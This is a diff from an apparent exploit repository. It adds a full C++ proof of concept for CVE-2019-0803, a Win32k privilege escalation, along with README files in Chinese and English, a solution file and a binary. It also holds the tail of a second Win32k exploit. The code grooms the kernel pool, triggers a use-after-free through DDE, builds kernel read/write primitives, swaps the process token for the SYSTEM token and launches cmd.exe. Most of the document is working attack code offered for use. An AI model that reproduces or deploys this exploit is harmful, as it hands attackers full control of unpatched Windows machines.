ULONG_PTR lpszMenuName = *(PULONG_PTR)(cls - p_leak.g_DeltaDesktopHeap + 0x50);
cout << "lpszMenuName kernel: 0x" << hex << lpszMenuName << endl;
Sleep(200);
//__asm int 3
HACCEL haccel;
session_pool_fill_ge_0x20(0xa0, 1, &haccel);
//第一次释放
SetClassLongPtr(hwnd, GCLP_MENUNAME, (LONG)L"xxx");
DestroyAcceleratorTable(haccel);
SparyDC();
//__asm int 3
//第二次释放
DestroyWindow(hwnd);
if (!ReleaseClass(L"associated class", GetModuleHandle(0)))
{
cout << "UnregisterClass error" << endl;
}
if (!session_pool_fill_ge_0xa0(0xa0, 0x1000, g_hPalettle))
{
cout << "error " << endl;
}
//验证palette是否成功
for (size_t i = 0; i < 0x1000; i++)
{
g_KernelPalettle[i] = (ULONG_PTR)p_leak.GetGdiKernelAddress(g_hPalettle[i]);
if (lpszMenuName == g_KernelPalettle[i])
{
Manage_index = i;
hManage = g_hPalettle[Manage_index];
cout << "success fill 0xa0 by palette" << endl;
cout << "Manage palette kernel: 0x" << hex << g_KernelPalettle[Manage_index] << endl;
cout << "palette : 0x" << hex << hManage << endl;
}
}
modify_palPoniter();
copy_token();
fix_dc();
return 0;
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// main
//
int main()
{
auto hDesk = CreateDesktop(L"newDesktop", NULL, NULL, NULL, DESKTOP_CREATEWINDOW, NULL);
if (!SetThreadDesktop(hDesk))
{
cout << "SetThreadDesktop error" << endl;
}
// pool fengshui
HPALETTE hpalette[0x100];
if (!session_pool_fill_ge_0x20(0xC00, number, hAccel))
{
cout << "error " << endl;
}
if (!session_pool_fill_ge_0x20(0x360, number, hAccel))
{
cout << "error " << endl;
}
if (!session_pool_fill_ge_0xa0(0xa0, 0x100, hpalette))
{
cout << "error " << endl;
}
// allocate 0xa0 size lpszMenuName
wchar_t lpszMenuName[0x200] = { 0 };
for (size_t i = 0; i < 0x48; i++) // (pool_size - 8) / 2 - 4
{
*(lpszMenuName + i) = 0xbeef;
}
WNDCLASSEX wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEX);
wndClass.lpszClassName = L"associated class";
wndClass.lpszMenuName = lpszMenuName;
wndClass.hInstance = GetModuleHandle(NULL);
wndClass.lpfnWndProc = DefWindowProc;
RegisterClassEx(&wndClass);
//Create DC for NtGdiSetLinkedUFIs
for (ULONG_PTR i = 0; i < 0x1000; i++)
{
g_hDC[i] = (ULONG_PTR)CreateCompatibleDC(NULL);
}
//start exploit
auto hThread = CreateThread(0, 0, ThreadProc, 0, 0, 0);
WaitForSingleObject(hThread, INFINITE);
system("cmd");
return true;
}

48
00-CVE_EXP/CVE-2019-0803/README.md Normal file
View File

@ -0,0 +1,48 @@
### CVE-2019-0803
#### 描述
Win32k 权限提升漏洞
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64/ARM64 | 1709 | | |
| Windows 10 | x86/x64/ARM64 | 1803 | | |
| Windows 10 | x86/x64/ARM64 | 1809 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | &#10004; |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1709 | | |
| Windows Server | | 1803 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803
```
#### 利用方式
编译环境
- VS2019V142X64 Debug
这里测试机器是Windows Server 2008 R2 x64上GIF图
![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif)
#### 分析文章
- https://bbs.pediy.com/thread-260289.htm
- https://www.jianshu.com/p/91e0f79f36eb
- https://zhuanlan.zhihu.com/p/62520006

48
00-CVE_EXP/CVE-2019-0803/README_EN.md Normal file
View File

@ -0,0 +1,48 @@
### CVE-2019-0803
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64/ARM64 | 1709 | | |
| Windows 10 | x86/x64/ARM64 | 1803 | | |
| Windows 10 | x86/x64/ARM64 | 1809 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | &#10004; |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1709 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803
```
#### Utilization
CompilerEnvironment
- VS2019V142X64 Debug
Here the test machine is Windows Server 2008 R2 X64, on the GIF map
![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif)
#### Analyze
- https://bbs.pediy.com/thread-260289.htm
- https://www.jianshu.com/p/91e0f79f36eb
- https://zhuanlan.zhihu.com/p/62520006

BIN
00-CVE_EXP/CVE-2019-0803/poc_test.exe Normal file
View File

Binary file not shown.

31
00-CVE_EXP/CVE-2019-0803/poc_test.sln Normal file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.27428.2005
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "poc_test", "poc_test\poc_test.vcxproj", "{13B512BD-3E32-4787-9C1C-0966899F3608}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x64.ActiveCfg = Debug|x64
{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x64.Build.0 = Debug|x64
{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x86.ActiveCfg = Debug|Win32
{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x86.Build.0 = Debug|Win32
{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x64.ActiveCfg = Release|x64
{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x64.Build.0 = Release|x64
{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x86.ActiveCfg = Release|Win32
{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {FC1892D3-67AE-4D7F-99F6-684EA05DA216}
EndGlobalSection
EndGlobal

BIN
00-CVE_EXP/CVE-2019-0803/poc_test/DDE.cpp Normal file
View File

Binary file not shown.

570
00-CVE_EXP/CVE-2019-0803/poc_test/main.cpp Normal file
View File

@ -0,0 +1,570 @@
#include "stdafx.h"
PSHAREDINFO gSharedInfo = NULL;
HWND hwndIcon1 = NULL;
HWND hwndIcon2 = NULL;
PBYTE pwndIcon1 = NULL;
PBYTE pwndIcon2 = NULL;
HWND hwndMenu = NULL;
unsigned long long MySecTokenAddr = NULL;
unsigned long long MyEPROCESSAddr = NULL;
HDC hdc = NULL;
HGDIOBJ hgdiObj = NULL;
PBYTE pgdiObj = NULL;
HBITMAP hBitmap[1000] = { NULL };
static PBYTE buffFakePal = NULL;
static LPACCEL buffAccTabl = NULL;
unsigned long long SystemSecurityTokenAddr = NULL;
static BOOL xxInitExploitInfo(VOID)
{
gSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32"), "gSharedInfo");
return TRUE;
}
static BOOL xxZeroIconWindow2strName(VOID)
{
DWORD offset = (DWORD)((pwndIcon2 + OFFSET_STRNAME_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
DWORD dwori3 = GetWindowLong(hwndIcon1, offset + 0x8);
DWORD dwori4 = GetWindowLong(hwndIcon1, offset + 0xC);
SetWindowLongW(hwndIcon1, offset + 0x0, 0);
SetWindowLongW(hwndIcon1, offset + 0x4, 0);
SetWindowLongW(hwndIcon1, offset + 0x8, 0);
SetWindowLongW(hwndIcon1, offset + 0xC, 0);
WCHAR szPath[100] = {};
GetWindowText(hwndIcon2, szPath, 100);
printf("[*]text:%ws\n", szPath);
if (wcslen(szPath) == 0)
{
SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
SetWindowLongW(hwndIcon1, offset + 0x8, dwori3);
SetWindowLongW(hwndIcon1, offset + 0xC, dwori4);
return TRUE;
}
else
{
return FALSE;
}
}
typedef struct _LARGE_UNICODE_STRING
{
ULONG Length; // 000
ULONG MaximumLength : 31; // 004
ULONG bAnsi : 1; // 004
PWSTR Buffer; // 008
} LARGE_UNICODE_STRING, * PLARGE_UNICODE_STRING;
static BOOL WriteKernelAddress(UINT64 qwAddress, LPWSTR content)
{
DWORD offset = (DWORD)((pwndIcon2 + OFFSET_STRNAME_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
//注:这里不要把LARGE_UNICODE_STRING的长度字段设置成0了
//DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
//DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
DWORD dwori3 = GetWindowLong(hwndIcon1, offset + 0x8);
DWORD dwori4 = GetWindowLong(hwndIcon1, offset + 0xC);
//SetWindowLongW(hwndIcon1, offset + 0x0, 0);
//SetWindowLongW(hwndIcon1, offset + 0x4, 0);
SetWindowLongW(hwndIcon1, offset + 0x8, (qwAddress & 0xffffffff));
SetWindowLongW(hwndIcon1, offset + 0xC, (qwAddress & 0xffffffff00000000) >> 32);
SetWindowText(hwndIcon2, content);
//SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
//SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
SetWindowLongW(hwndIcon1, offset + 0x8, dwori3);
SetWindowLongW(hwndIcon1, offset + 0xC, dwori4);
return TRUE;
}
static int ReadKernelAddress(UINT64 qwAddress)
{
DWORD offset = (DWORD)((pwndIcon2 + OFFSET_SPWNDPARENT_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
SetWindowLongW(hwndIcon1, offset + 0x0, (qwAddress & 0xffffffff));
SetWindowLongW(hwndIcon1, offset + 0x4, (qwAddress & 0xffffffff00000000) >> 32);
unsigned int read = (int)GetAncestor(hwndIcon2, GA_PARENT);
SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
return read;
}
unsigned long long ReadPtrFromKernelMemory(unsigned long long addr) {
unsigned int LowAddr = ReadKernelAddress(addr);
unsigned int HighAddr = ReadKernelAddress(addr + 4);
unsigned long long Addr = ((unsigned long long)HighAddr << 32) + LowAddr;
return Addr;
}
typedef struct _HEAD
{
HANDLE h;
DWORD cLockObj;
} HEAD, * PHEAD;
typedef struct _THROBJHEAD
{
HEAD h;
PVOID pti;
} THROBJHEAD, * PTHROBJHEAD;
typedef struct _THRDESKHEAD
{
THROBJHEAD h;
PVOID rpdesk;
PVOID pSelf; // points to the kernel mode address
} THRDESKHEAD, * PTHRDESKHEAD;
void FindSecurityTokens() {
unsigned long long pti = (unsigned long long)(&((THRDESKHEAD*)pwndIcon1)->h.pti);
printf("[*]Searching for current processes EPROCESS structure\n");
unsigned long long ptiaddress = ReadPtrFromKernelMemory(pti);
printf("\tptiaddress == %llx\n", ptiaddress);
unsigned long long threadTagPointer = ReadPtrFromKernelMemory(ptiaddress);
printf("\ttagTHREAD == %llx\n", threadTagPointer);
unsigned long long kapcStateAddr = ReadPtrFromKernelMemory(threadTagPointer + OFFSET_APCADDR_WIN7);
printf("\tkapc_stateAddr == %llx\n", kapcStateAddr);
MyEPROCESSAddr = ReadPtrFromKernelMemory(kapcStateAddr + OFFSET_APCEPROCESS_WIN7);
MySecTokenAddr = ReadPtrFromKernelMemory(MyEPROCESSAddr + OFFSET_SECTOKEN_WIN7);
printf("\tOriginal security token pointer: 0x%llx\n", MySecTokenAddr);
printf("[*]Searching for SYSTEM security token address\n");
unsigned long long nextProc = ReadPtrFromKernelMemory(MyEPROCESSAddr + OFFSET_EPROCESSBLINK_WIN7) - OFFSET_EPROCESSBLINK_WIN7;
printf("\tNext eprocess address: 0x%llx\n", nextProc);
unsigned int pid = ReadKernelAddress(nextProc + OFFSET_EPROCESSPID_WIN7);
printf("\tFound pid: 0x%X\n", pid);
while (true) {
nextProc = ReadPtrFromKernelMemory(nextProc + OFFSET_EPROCESSBLINK_WIN7) - OFFSET_EPROCESSBLINK_WIN7;
printf("\tNext eprocess address: 0x%llx\n", nextProc);
pid = ReadKernelAddress(nextProc + OFFSET_EPROCESSPID_WIN7);
printf("\tFound pid: 0x%X\n", pid);
//Step 9.2
if (pid == 4) {
printf("\ttarget process found!\n");
SystemSecurityTokenAddr = ReadPtrFromKernelMemory(nextProc + OFFSET_SECTOKEN_WIN7);
break;
}
}
}
static BOOL xxCreateIconWindowEx(VOID)
{
// icon
HWND hwnd1 = CreateWindowExW(0,
L"#32772",
NULL,
WS_MINIMIZE | WS_DISABLED,
0,
0,
0,
0,
NULL,
NULL,
NULL,
NULL);
// icon
HWND hwnd2 = CreateWindowExW(0,
L"#32772",
NULL,
WS_MINIMIZE | WS_DISABLED,
0,
0,
0,
0,
NULL,
NULL,
NULL,
NULL);
PSERVERINFO psi = gSharedInfo->psi;
PHANDLEENTRY phe = gSharedInfo->aheList;
PBYTE pwnd1 = NULL;
PBYTE pwnd2 = NULL;
for (ULONG c = 0; c < psi->cHandleEntries; c++)
{
if ((HWND)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hwnd1)
{
pwnd1 = (PBYTE)phe[c].phead;
break;
}
}
for (ULONG c = 0; c < psi->cHandleEntries; c++)
{
if ((HWND)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hwnd2)
{
pwnd2 = (PBYTE)phe[c].phead;
break;
}
}
if (pwnd1 <= pwnd2)
{
pwndIcon1 = pwnd1;
hwndIcon1 = hwnd1;
pwndIcon2 = pwnd2;
hwndIcon2 = hwnd2;
}
else
{
pwndIcon1 = pwnd2;
hwndIcon1 = hwnd2;
pwndIcon2 = pwnd1;
hwndIcon2 = hwnd1;
}
printf("[+]WND1: %p, WND2: %p\n", pwndIcon1, pwndIcon2);
return TRUE;
}
static BOOL xxTriggerExploitEx(VOID)
{
DWORD count = 0;
HACCEL hAccel1[1000] = { NULL };
HACCEL hAccel2[1000] = { NULL };
for (UINT i = 0; i < 200; i++)
{
//用来塞内存空隙确保0x350大小的内存碎片间隙刚好被填满避免后续Bitmap和DIB占坑出现问题
LPACCEL Entries = (LPACCEL)malloc(132 * sizeof(Entries));
for (UINT i = 0; i < 132; i++)
{
Entries[i].fVirt = FCONTROL;
Entries[i].key = 0x1234;
Entries[i].cmd = 0x4444;
}
hAccel1[i] = NtUserCreateAcceleratorTable(Entries, 132);
if (hAccel1[i] == NULL)
{
break;
}
}
//用来占坑
for (UINT i = 0; i < 1000; i++)
{
LPACCEL Entries = (LPACCEL)malloc(533 * sizeof(Entries));
for (UINT i = 0; i < 533; i++)
{
Entries[i].fVirt = FCONTROL;
Entries[i].key = 0x1234;
Entries[i].cmd = 0x4444;
}
hAccel2[i] = NtUserCreateAcceleratorTable(Entries, 533);
}
for (UINT i = 0; i < 400; i++)
{
hBitmap[i] = CreateBitmap(16, 16, 1, 8, NULL);
if (hBitmap[i] == NULL)
{
break;
}
}
hwndMenu = CreateWindowExW(WS_EX_DLGMODALFRAME | WS_EX_LEFTSCROLLBAR | WS_EX_NOINHERITLAYOUT | WS_EX_LAYOUTRTL | WS_EX_COMPOSITED,
L"#32768",
L"bar",
0x43A | WS_MAXIMIZEBOX | WS_VSCROLL | WS_CAPTION | WS_MAXIMIZE,
58,
18,
60,
-23,
NULL,
NULL,
NULL,
NULL);
NtUserShowWindow(hwndMenu, 0);
UpdateWindow(hwndMenu);
PAINTSTRUCT paint = { 0 };
hdc = NtUserBeginPaint(hwndMenu, &paint);
hgdiObj = GetCurrentObject(hdc, OBJ_BITMAP);
pgdiObj = *(PBYTE *)((*(PBYTE *)((*(PBYTE *)(__readgsqword(0x30) + 0x60)) + 0xF8)) + sizeof(HANDLEENTRY) * (WORD)(DWORD_PTR)hgdiObj);
for (UINT i = 400; i < 800; i++)
{
hBitmap[i] = CreateBitmap(16, 16, 1, 8, NULL);
if (hBitmap[i] == NULL)
{
break;
}
}
for (UINT i = 0; i < 1000; i++)
{
PBYTE pacc = NULL;
HACCEL hacc = hAccel2[i];
PHANDLEENTRY phe = gSharedInfo->aheList;
for (UINT c = 0; c < gSharedInfo->psi->cHandleEntries; c++)
{
if ((HACCEL)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hacc)
{
pacc = (PBYTE)phe[c].phead;
break;
}
}
if (pgdiObj == pacc + 0xCB0)
{
Sleep(1000);
return TRUE;
}
}
return FALSE;
}
static VOID xxBuildGlobalAccTableEx(PVOID pcbWndExtra)
{
DWORD num = 0;
if (buffFakePal == NULL)
{
buffFakePal = (PBYTE)malloc(0x98); // PALETTE
ZeroMemory(buffFakePal, 0x98);
*(PVOID *)(buffFakePal + 0x80) = pcbWndExtra; //DBI对象中tagRGBQUAD地址修改为第一个窗口WndExtra的地址
*(DWORD *)(buffFakePal + 0x1C) = 1; // PALETTE->cEntries
*(PVOID *)(buffFakePal + 0x88) = &num;
}
if (buffAccTabl == NULL)
{
buffAccTabl = (LPACCEL)malloc(sizeof(ACCEL) * 132);
ZeroMemory(buffAccTabl, sizeof(ACCEL) * 132);
}
for (UINT i = 0; i < 132; i++)
{
buffAccTabl[i].fVirt = FCONTROL;
buffAccTabl[i].key = 0x1234;
buffAccTabl[i].cmd = 0x4444;
}
buffAccTabl[11].key = 2;
buffAccTabl[11].cmd = 0;
buffAccTabl[12].fVirt = 0;
buffAccTabl[12].key = 0;
*(WORD *)&buffAccTabl[15].key = (WORD)((DWORD_PTR)buffFakePal);
*(WORD *)&buffAccTabl[15].cmd = (WORD)((DWORD_PTR)buffFakePal >> 16);
*(WORD *)&buffAccTabl[16].fVirt = (WORD)((DWORD_PTR)buffFakePal >> 32);
*(WORD *)&buffAccTabl[16].key = (WORD)((DWORD_PTR)buffFakePal >> 48);
}
INT PocMain2()
{
WCHAR szExePath[MAX_PATH] = { 0 };
GetModuleFileNameW(NULL, szExePath, MAX_PATH);
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2019-0803" << std::endl;
std::cout << "-------------------" << std::endl;
DWORD times = 0;
xxInitExploitInfo();
xxCreateIconWindowEx();
SetWindowText(hwndIcon2, L"abc");
BOOL bReturn = FALSE;
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
si = { 0 };
pi = { 0 };
si.cb = sizeof(STARTUPINFO);
bReturn = CreateProcessW(szExePath,
(LPWSTR)L" DDEServer",
NULL,
NULL,
FALSE,
NULL,
NULL,
NULL,
&si,
&pi);
if (!bReturn)
{
return 0;
}
do
{
printf("[+]trying %d times \r\n", times);
if (xxTriggerExploitEx())
{
printf("[!]xxTriggerExploitEx Success \r\n");
break;
}
NtUserDestroyWindow(hwndMenu);
} while (++times < 10);
HWND hwndSrever = NULL;
do
{
hwndSrever = FindWindowW(NULL, L"DDEServerPoc");
} while (hwndSrever == NULL && (Sleep(300), TRUE));
//将之前获取到的GDI句柄传给DDEServer用于之后句柄替换触发漏洞
SendMessageW(hwndSrever, MSG_DDESERVER_SET_GDI_OBJ_ADDR, (WPARAM)hgdiObj, NULL);
//getchar();
si = { 0 };
pi = { 0 };
si.cb = sizeof(STARTUPINFO);
bReturn = CreateProcessW(szExePath,
(LPWSTR)L" DDEClient",
NULL,
NULL,
FALSE,
NULL,
NULL,
NULL,
&si,
&pi);
if (!bReturn)
{
return 0;
}
HWND hwnd = NULL;
do
{
hwnd = FindWindowW(NULL, L"DDEClientPoc");
} while (hwnd == NULL && (Sleep(300), TRUE));
printf("[+]hTriggerWindow %p\n", hwnd);
for (UINT i = 0; i < 300; i++)
{
if (hBitmap[i] != NULL)
{
DeleteObject(hBitmap[i]);
hBitmap[i] = NULL;
}
}
xxBuildGlobalAccTableEx(pwndIcon1 + OFFSET_CBWNDEXTRA_WIN7);
SendMessageW(hwnd, MSG_DDESERVER_EXIT, NULL, NULL);
WaitForSingleObject(pi.hProcess, INFINITE);
for (UINT i = 300; i < 700; i++)
{
if (hBitmap[i] != NULL)
{
DeleteObject(hBitmap[i]);
hBitmap[i] = NULL;
}
}
printf("[+]Wait\n");
Sleep(8000);
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
HACCEL hAcc[2000] = { NULL };
for (UINT i = 0; i < 2000; i++)
{
hAcc[i] = NtUserCreateAcceleratorTable(buffAccTabl, 132); // UAF
if (hAcc[i] == NULL)
{
break;
}
}
RGBQUAD number = {};
number.rgbBlue = 0x78;
number.rgbGreen = 0x56;
number.rgbRed = 0x34;
if (SetDIBColorTable(hdc, 0, 1, (const RGBQUAD *)&number))
{
printf("[+]SetDIBColorTable OK\n");
}
if (xxZeroIconWindow2strName())
{
printf("[+]hTriggerWindow OK\n");
}
else
{
printf("[!]hTriggerWindow Failed\n");
return 0;
}
FindSecurityTokens();
wchar_t strSysSecToken[5] = { 0x00 };
strSysSecToken[3] = (SystemSecurityTokenAddr >> 48) & 0xFFFF;
strSysSecToken[2] = (SystemSecurityTokenAddr >> 32) & 0xFFFF;
strSysSecToken[1] = (SystemSecurityTokenAddr >> 16) & 0xFFFF;
strSysSecToken[0] = (SystemSecurityTokenAddr >> 0) & 0xFFFF;
printf("[+]Security token to steal: 0x%llx\n", SystemSecurityTokenAddr);
WriteKernelAddress(MyEPROCESSAddr + OFFSET_SECTOKEN_WIN7, strSysSecToken);
printf("Run Cmd...\n");
system("cmd.exe");
return 0;
}
INT DDEServer();
INT DDEClient();
INT main(int argc, char *argv[])
{
if (argc == 1)
{
PocMain2();
return 0;
}
if (argc != 2)
{
return -1;
}
if (strcmp(argv[1], "DDEServer") == 0)
{
DDEServer();
}
else if (strcmp(argv[1], "DDEClient") == 0)
{
DDEClient();
}
return 0;
}

176
00-CVE_EXP/CVE-2019-0803/poc_test/poc_test.vcxproj Normal file
View File

@ -0,0 +1,176 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{13B512BD-3E32-4787-9C1C-0966899F3608}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>poctest</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
